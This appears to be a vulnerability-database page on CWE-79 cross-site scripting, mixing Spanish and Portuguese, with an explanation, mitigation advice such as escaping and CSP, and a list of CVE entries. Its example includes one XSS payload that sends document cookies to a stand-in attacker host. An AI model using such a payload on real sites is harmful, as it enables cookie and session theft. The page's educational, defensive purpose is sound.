Fallos del tipo CWE-79

29.084 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2025-71404MEDIUMbetter-auth before 1.1.16 Reflected XSS via error parameterEPSS 0.5%CVE-2022-29432LOWWordPress wpDataTables plugin <= 2.1.27 - Multiple Authenticated Persistent Cross-Site Scripting (XSS) vulnerabilitiesEPSS 0.5%CVE-2022-29428MEDIUMWordPress WP Slider Plugin <= 1.4.5 - Cross-Site Scripting (XSS) vulnerabilityEPSS 0.5%CVE-2024-27926MEDIUMRSSHub Cross-site Scripting vulnerability caused by internal media proxyEPSS 0.5%CVE-2024-48569MEDIUMProactive Risk Manager version 9.1.1.0 is affected by multiple Cross-Site Scripting (XSS) vulnerabilities in the add/edit form fields, at thEPSS 0.5%CVE-2024-12979MEDIUMcode-projects Job Recruitment _all_edits.php cn_update cross site scriptingEPSS 0.5%CVE-2024-9394MEDIUMAn attacker could, via a specially crafted multipart response, execute arbitrary JavaScript under the `resource://devtools` origin. This coEPSS 0.5%CVE-2015-10058LOWWikisource Category Browser index.php cross site scriptingEPSS 0.5%CVE-2019-19284—A vulnerability has been identified in XHQ (All Versions < 6.1). The web interface could allow Cross-Site Scripting (XSS) attacks if an attaEPSS 0.5%CVE-2015-10059LOWs134328 Webapplication-Veganguide apiService.js cross site scriptingEPSS 0.5%CVE-2024-1960MEDIUMShopLentor <= 2.8.1 - Authenticated(Contributor+) Stored Cross-Site Scripting via Banner LinkEPSS 0.5%CVE-2024-49550MEDIUMAdobe Connect | Cross-site Scripting (Reflected XSS) (CWE-79)EPSS 0.5%CVE-2017-5257—In version 3.5 and prior of Cambium Networks ePMP firmware, an attacker who knows (or guesses) the SNMP read/write (RW) community string canEPSS 0.5%CVE-2021-36833MEDIUMWordPress MC4WP plugin <= 4.8.6 - Authenticated Stored Cross-Site Scripting (XSS) vulnerabilityEPSS 0.5%CVE-2023-5706MEDIUMVK Blocks <= 1.63.0.1 - Authenticated (Contributor+) Stored Cross-Site Scripting via BlockEPSS 0.5%CVE-2023-27070MEDIUMA stored cross-site scripting (XSS) vulnerability in TotalJS OpenPlatform commit b80b09d allows attackers to execute arbitrary web scripts oEPSS 0.5%CVE-2019-6835—A Cross-Site Scripting (XSS) CWE-79 vulnerability exists in U.motion Server (MEG6501-0001 - U.motion KNX server, MEG6501-0002 - U.motion KNXEPSS 0.5%CVE-2023-0731MEDIUMInteractive Geo Maps <= 1.5.9 - Authenticated (Editor+) Stored Cross-Site ScriptingEPSS 0.5%CVE-2022-29424MEDIUMWordPress Image Hover Effects Ultimate plugin <= 9.7.1 - Authenticated Reflected Cross-Site Scripting (XSS) vulnerabilityEPSS 0.5%CVE-2023-27775MEDIUMA stored HTML injection vulnerability in LiveAction LiveSP v21.1.2 allows attackers to execute arbitrary code via a crafted payload.EPSS 0.5%